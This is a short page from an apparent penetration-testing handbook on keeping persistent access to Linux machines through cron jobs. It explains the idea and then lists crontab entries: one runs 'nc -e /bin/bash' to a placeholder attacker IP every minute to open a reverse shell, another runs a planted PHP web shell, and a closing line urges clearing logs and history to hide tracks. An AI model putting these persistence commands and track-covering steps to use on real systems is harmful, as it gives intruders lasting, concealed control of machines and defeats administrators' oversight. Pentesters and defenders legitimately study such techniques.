handbook/tools/5.Machine/1.Linux/General/Exploitation/2.Persistence/5.Cron-Jobs.md
2024-08-31 01:07:22 +02:00

27 lines
1.4 KiB
Markdown

## General
In computer systems, a cron job is a task that is scheduled to run automatically at a specified time or interval. Cron jobs are typically used to perform system maintenance tasks, such as backing up data or updating system software.
Persistence exploitation refers to the use of a vulnerability in a system to allow an attacker to maintain a persistent presence on the system, even after the system has been restarted or the attacker has been disconnected. This can be achieved through the use of cron jobs by scheduling a task to run at regular intervals and establish a connection back to the attacker's system.
For example, an attacker could exploit a vulnerability in a web server to install a cron job that runs a script every hour to establish a reverse shell connection back to the attacker's system. This would allow the attacker to maintain access to the compromised system even if the web server is restarted or the attacker's initial connection is terminated.
## Commands
Check the cron jobs running & Edit the crons jobs
```
cat /etc/crontab
* * * * * nc -e /bin/bash Attacker_IP PORT 2>/dev/null ---> Every minutes
or run a file where you might have a reverse sheel
* * * * * php -f /var/www/html/Evilbackup.php ---> Check Web shell section for more information
```
- Not very anonymous since administrator can see IP in the script
===Dont Forget to Clear Tracks (Check [[🧹 CLEAR Logs & History]])===